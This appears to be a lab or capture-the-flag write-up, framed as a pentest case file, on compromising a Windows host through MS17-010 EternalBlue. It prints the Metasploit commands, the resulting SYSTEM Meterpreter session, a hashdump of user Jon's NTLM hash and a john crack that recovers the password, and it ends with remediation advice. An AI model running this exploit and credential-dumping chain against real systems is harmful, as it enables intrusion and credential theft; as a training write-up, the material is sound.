EternalBlue SMB RCE, SYSTEM Meterpreter, and NTLM hash crack
Foundations Windows engagement: MS17-010 EternalBlue via Metasploit yielded SYSTEM; hashdump recovered Jon’s NTLM; rockyou cracked alqfna22 and located admin artifacts.
- Case files
- EternalBlue SMB RCE, SYSTEM Meterpreter, and NTLM hash crack
Ports 135/139/445 and smb-vuln confirmed ms17-010. EternalBlue Meterpreter as SYSTEM dumped Jon:alqfna22 and three engagement artifacts.
Vuln scan confirmed ms17-010; Metasploit EternalBlue returned a session.
SYSTEM hashdump cracked Jon to alqfna22; search located three flags.
Engagement summary
Ports 135/139/445 and smb-vuln confirmed ms17-010. EternalBlue Meterpreter as SYSTEM dumped Jon:alqfna22 and three engagement artifacts.
BLUE was an unpatched Windows host with SMB exposed. Nmap showed three ports under 1000 (135, 139, 445); smb-vuln-* confirmed MS17-010. Metasploit exploit/windows/smb/ms17_010_eternalblue with RHOSTS set returned a shell; post/multi/manage/shell_to_meterpreter upgraded the session. hashdump listed non-default user Jon; john --format=NT cracked alqfna22. Artifacts lived at system root, under System32\config, and in Jon’s Documents.
Business impact
Internet-facing SMB with MS17-010 is ransomware-grade RCE (WannaCry class). Patch MS17-010, block 445 at the edge, and disable SMBv1. Treat any EternalBlue hit as full domain-risk until proven isolated.
SMB recon and EternalBlue
Vuln scan confirmed ms17-010; Metasploit EternalBlue returned a session.
OPERATOR · NMAP / MSF
savvy@lab:~$ nmap -sV --script smb-vuln* -p135,139,445 10.10.10.40
445/tcp open microsoft-ds VULNERABLE: MS17-010
savvy@lab:~$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.10.10.40
msf6 exploit(...) > run
Meterpreter session 1 opened
Hashdump, crack, and artifact recovery
SYSTEM hashdump cracked Jon to alqfna22; search located three flags.
OPERATOR · METERPRETER
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(...) > set SESSION 1
meterpreter > getuid
NT AUTHORITY\SYSTEM
meterpreter > hashdump
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
savvy@lab:~$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt jon.hash
alqfna22 (Jon)
meterpreter > search -f flag*.txt
C:\flag1.txt C:\Windows\System32\config\flag2.txt C:\Users\Jon\Documents\flag3.txt
Remediation
Apply MS17-010 immediately; remove SMBv1; restrict SMB to trusted VLANs. Rotate all local passwords after a SYSTEM compromise.